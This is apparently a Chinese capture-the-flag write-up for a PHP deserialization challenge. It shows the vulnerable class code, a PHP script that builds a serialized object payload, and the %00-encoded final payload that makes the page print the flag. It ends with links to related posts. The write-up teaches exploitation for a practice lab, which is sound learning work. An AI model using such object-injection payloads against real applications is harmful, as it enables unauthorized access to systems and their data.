[极客大挑战 2019]PHP

  1. 题目:
  2. 解题思路及步骤:看到题目没什么思路,于是就尝试去扫目录:发现有个有用的目录:www.zip: -x400-600 排除状态码为400-600的
  3. 于是我们进行访问,果然得到一个新文件www.zip,查看发现有以下内容:
  1. 查看flag.php,肯定不会再这么明显的地方,
  2. 查看index.php文件发现真正的题目在这里:这里是包含了文件,class.php,可知是一个反序列化题目,我们查看一下class.php文件,得到:
python 复制代码
class Name{
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }

    function __wakeup(){
        $this->username = 'guest';
    }
//wakeup()函数的作用是反序列化之前调用,并将username这个属性赋值为guest
//下面这个函数是在对象被销毁时调用
    function __destruct(){
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;echo "</br>";
            echo "You password is: ";
            echo $this->password;echo "</br>";
            die();
        }
//这里可以知道密码应为100,用户名应该为admin
        if ($this->username === 'admin') {
            global $flag;
            echo $flag;
        }else{
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die();

            
        }
    }
  1. 于是编写脚本:
php 复制代码
<?php
  class Name{
  private $username = 'admin';
  private $password = '100';
}
$a = new Name();
echo serialize($a);
?>
//输出得到:
O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";s:3:"100";}
O表示 序列化类型为对象
4:对象名长度
Name:对象名
2:属性名个数
s:第一个属性类型为字符串
14:第一属性的长度(由于是私有属性,其实际长度比看到的要长,多了类名首尾的空格)
NameusernameL:空格+类名+空格+属性名
后面同理
  1. 由于反序列化后两个空格不见了,这时候在传参为O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";s:3:"100";}这里面得空格就看不见了,这样也确实得不到结果:因此使用空格的url编码将其表示出来:O:4:"Name":2:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";s:3:"100";}
  2. 得到flag:
相关推荐
亿坊电商36 分钟前
物联网领域中PHP框架的最佳选择有哪些?
物联网·struts·php
Magnetic_h38 分钟前
【iOS】设计模式复习
笔记·学习·ios·设计模式·objective-c·cocoa
hdsoft_huge1 小时前
Java & Spring Boot常见异常全解析:原因、危害、处理与防范
java·开发语言·spring boot
wuzuyu3651 小时前
用php做一个简易的路由
php·路由
风中的微尘1 小时前
39.网络流入门
开发语言·网络·c++·算法
研梦非凡1 小时前
ICCV 2025|从粗到细:用于高效3D高斯溅射的可学习离散小波变换
人工智能·深度学习·学习·3d
lubiii_2 小时前
网络安全渗透测试第一步信息收集
安全·web安全·网络安全
未来之窗软件服务2 小时前
幽冥大陆(二)RDIFSDK 接口文档:布草洗涤厂高效运营的技术桥梁C#—东方仙盟
开发语言·c#·rdif·仙盟创梦ide·东方仙盟
小冯记录编程2 小时前
C++指针陷阱:高效背后的致命危险
开发语言·c++·visual studio
limengshi1383922 小时前
机器学习面试:请介绍几种常用的学习率衰减方式
人工智能·学习·机器学习